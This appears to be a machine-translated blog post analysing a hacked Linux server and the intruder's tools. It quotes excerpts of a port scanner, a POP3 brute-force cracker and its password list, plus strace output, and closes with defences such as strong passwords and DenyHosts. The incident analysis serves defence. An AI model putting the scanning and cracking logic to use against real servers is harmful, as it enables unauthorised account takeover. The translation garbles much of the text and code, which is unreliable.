Analysis of a Linux server's hack Process

Introduction
Recently, I encountered a problem of hack on a server. The server becomes a bot and keeps trying to crack the accounts of other servers. Next, we will analyze the tools left by hackers on the server, learn the hack method for getting started, and learn the corresponding preventive measures.
Hack Tool
Hacker is used to log on to an intruded server. Generally, the "w" command is used to view the login information, the "passwd" command is used to modify the current user password, and wget is used to obtain the Elevation of Privilege and other hack tools. Hacker generally decompress the tool to a directory whose name starts with "." To hide the tool. The following are the "gifts" That hacker leaves on the server ":

Linux:/tmp/. ssh # ll
Total 340
-Rw-r -- 1 root 7289 06-03 13:06 pass_file
-Rwxr-xr-x 1 root 17274 06-03 13:20 pscan
-Rw-r -- 1 root 6071 06-03 13:10 pscan. c
-Rwxr-xr-x 1 root 302240 06-03 13:06 screen
-Rw-r -- 1 root 1444 06-03 13:06 sesion. php

Next we will analyze the functions of the above tools one by one.
Remote session management tool screen
Screen is mainly used to manage multiple windows and disconnect the process from the original remote connection.
Multi-Window Management
Sometimes we need to execute some time-consuming programs. After these programs run, we can operate the terminal. If you want to perform other operations while the time-consuming program is running, you need to enable the remote login terminal. Use screen to avoid opening multiple login terminals. The following describes how to use screen to simulate opening multiple windows.
Before executing the screen program, run the "who" command to check that there are two users on machine A who log on from the local machine and remotely:
Linux:/tmp/. ssh> who
Lx: 0
Lx pts/0 (192.168.1.102)
After running screen through remote pts/0, enter a new command operation window and add a remote login:
Linux:/tmp/. ssh> who
Lx: 0
Lx pts/0 (192.168.1.102)
Lx pts/1
In screen, we can use the "ctrl + a + c" combination key to create a new window, and use the "ctrl + a + n/p" combination key to switch back and forth between windows. In this way, when the time-consuming program is executed, we can create or switch to another window to perform other operations.
Disconnect from original remote connection
When a program is executed on a remote terminal and the remote connection is closed without exiting the program, the program will be terminated. This will cause the time-consuming program to exit and the files that are not saved in the editing process to be lost if the work has not been completed. By using screen, you can exit the process without being remotely connected. This is also the main function of screen.
In the screen window, run a program:

Linux:/tmp/loop>./endless_loop
Running...

When the program is executed, we close the remote login terminal and enable the terminal locally on the server. We can see that the remote terminal has been closed:

Linux:/tmp/loop> who
Lx: 0
Lx pts/0 (: 0.0)

Check the previously remotely pulled endless_loop process to see that it is still running and screen is its ancestor process:

Linux:/tmp/loop> ps-elf | grep endless | grep-v grep
0 R lx 4851 4586 99 80 0-926-00:00:32 pts/1./endless_loop
Linux:/tmp/loop> ps-elf | grep 4586 | grep-v endless | grep-v grep
0 S lx 4586 4585 0 80 0-4193 wait 20:02 pts/1 00:00:00/bin/bash
Linux:/tmp/loop> ps-elf | grep 4585 | grep-v grep | grep-v 4586
1 S lx 4585 1 0 80 0-1036-20:02? 00:00:00./SCREEN
Www.2cto.com

For more information about screen, see here.

Brute force cracking account

Hacker is time-consuming and laborious to intrude into the server. Of course, it will not be left empty. After hacking into the server, hacker will not obtain information on the server, or convert the server into a meat machine and use it to crack more server accounts. Brute-force cracking of server accounts requires a certain system service, such as pop3, ssh, and telnet. The process can be divided into two steps:
● Scan the port of a system service on the server (for example, pop3 uses port 110 and ssh uses port 22)
● Password cracking for servers with opened ports
Port Scanner
Pscan is a port scanning program, and pscan. c is the source code. The implementation of the Port Scan function is not complex. First, allocate the socket Descriptor and fill the type with the target ip address and port number

Sockaddr_in structure:

Connlist [I]. s = socket (AF_INET, SOCK_STREAM, 0 );
Fcntl (connlist [I]. s, F_SETFL, O_NONBLOCK );
Connlist [I]. addr. sin_addr.s_addr = inet_addr (ip );
Connlist [I]. addr. sin_family = AF_INET;
Connlist [I]. addr. sin_port = htons (atoi (argv [2]);
Then call the connect function to try to establish a connection:
Ret = connect (connlist [I]. s, (struct sockaddr *) & connlist [I]. addr,
Sizeof (struct sockaddr_in ));
If (ret =-1 ){
If (errno = EISCONN) {// open the port
Fprintf (outfd, "% s \ n ",
(Char *) inet_ntoa (connlist [I]. addr. sin_addr ));
}
If (errno! = EALREADY) & (errno! = EINPROGRESS )){
// The peer port is closed.
}
}
Else {// port Enabled
Fprintf (outfd, "% s \ n ",
(Char *) inet_ntoa (connlist [I]. addr. sin_addr ));
}
By judging the return value of the connect function, we can see whether the port of the Peer server is enabled, and write the Server IP address of the opened port scanned to a file.

Password cracking

After the Server IP addresses of opened ports are recorded, the attacker will connect to the server corresponding to these IP addresses again and try to combine a large number of user names and passwords for system service authentication. The sesion. php at the beginning of the article is the php script used to crack the pop3 account. Each column of the pass_file file corresponds to a group of usernames and passwords.
Different system services (pop3, telnet, ssh, and so on) use different authentication methods, and the specific implementation methods of the cracking program are different. Relatively speaking, the implementation of the pop3 brute force cracking program is relatively simple:

Function POPa ($ username, $ password, $ server ){
$ Socket = fsockopen ($ server, 110); // POP3 port
If (! $ Socket ){
Return "cracked ";
}
$ Res = fgets ($ socket, 512); // read + OK
If (substr (trim ($ res), 0, 3 )! = "+ OK "){
Return "cracked"; // return the error
}
Fputs ($ socket, "USER $ username \ r \ n"); // send user
$ Res = fgets ($ socket, 512); // read + OK
If (substr (trim ($ res), 0, 3 )! = "+ OK "){
Return "cracked ";
}
Fputs ($ socket, "PASS $ password \ r \ n"); // send pass
$ Res = fgets ($ socket, 512); // read + OK
If (substr (trim ($ res), 0, 3 )! = "+ OK "){
Return $ res;
}
$ Fp = fopen ("vuln.txt", "");
Fwrite ($ fp, "$ server $ username $ password \ r \ n ");
}

First, use the fsockopen function to establish a connection with the peer end, and then send the user name and password to the peer end. If the password is sent, the first three characters in the response are "+ OK", indicating that the authentication is successful, and the corresponding user name and password are an account of the Peer pop3 server. After the authentication is successful, we record the user name and password of the Peer IP address in the vuln.txt file.
Use strace to track the above password cracking program. From the output results, we can better understand the interaction process between the two machines:

Socket (PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
Fcntl (3, F_GETFL) = 0x2 (flags O_RDWR)
Fcntl (3, F_SETFL, O_RDWR | O_NONBLOCK) = 0
Connect (3, {sa_family = AF_INET, sin_port = htons (110), sin_addr = inet_addr ("213.8.54.xx")}, 16) =-1 EINPROGRESS (Operation now in progress)
Poll ([{fd = 3, events = POLLIN | POLLOUT | POLLERR | POLLHUP}], 1, 60000) = 1 ([{fd = 3, revents = POLLOUT}])
Getsockopt (3, SOL_SOCKET, SO_ERROR, [0], [4]) = 0
Fcntl (3, F_SETFL, O_RDWR) = 0
Poll ([{fd = 3, events = POLLIN | POLLERR | POLLHUP}], 1, 60000) = 1 ([{fd = 3, revents = POLLIN}])
Recvfrom (3, "+ OK Microsoft Exchange Server 20"..., 8192, MSG_DONTWAIT, NULL, NULL) = 99
Sendto (3, "USER dennis \ r \ n", 13, MSG_DONTWAIT, NULL, 0) = 13
Poll ([{fd = 3, events = POLLIN | POLLERR | POLLHUP}], 1, 60000) = 1 ([{fd = 3, revents = POLLIN}])
Recvfrom (3, "+ OK \ r \ n", 8192, MSG_DONTWAIT, NULL, NULL) = 5
Sendto (3, "PASS dennis \ r \ n", 13, MSG_DONTWAIT, NULL, 0) = 13
Poll ([{fd = 3, events = POLLIN | POLLERR | POLLHUP}], 1, 60000) = 1 ([{fd = 3, revents = POLLIN}])
Recvfrom (3, "+ OK User successfully logged on."..., 8192, MSG_DONTWAIT, NULL, NULL) = 34
Sendto (3, "QUIT \ r \ n", 6, MSG_DONTWAIT, NULL, 0) = 6

Some Inspiration

It is inevitable that people will be involved. What can we do in advance to prevent hacker intrusion?
Set complex passwords
Let's take a look at the content of the pass_file file to see which usernames/passwords hacker attempts to crack the server account:
......
Michelle
Nobody
Administrator 123456
Qwerty
Backup
Info test12345
Shop
Sales
It can be seen that the password cannot be set to the same as the user name, or to a simple password such as "123456" or "test12345.

Open restricted ports

Hacker mostly invades through open ports on the server, which requires strict port management. Services such as telnet are rarely used and insecure, and most servers should be shut down. services such as ftp can be enabled and closed in time after use.

Use third-party tools to block attacks

For the above Type of violent attacks, if you use different accounts for authentication for thousands of times, can you set the number of allowed authentication attempts to exceed the set number of times, and the server will reject access to ip addresses?
Some tools help us implement the above functions, such as the DenyHosts tool. DenyHosts analyzes the log file of the sshd process and finds multiple failed login records, the access ip address is recorded in/etc/hosts. deny file to block access ip addresses, so as to block ssh brute force attacks.

Summary

This article introduces the usage of screen, the implementation of port scanning programs, and the method for getting started with brute-force cracking accounts. At last, it introduces several preventive measures to prevent brute-force cracking.
The server that becomes a meat machine keeps scanning and cracking accounts for various network segments for 7x24 hours. Therefore, the chances of attacks are very high. take preventive measures and do not take it lightly.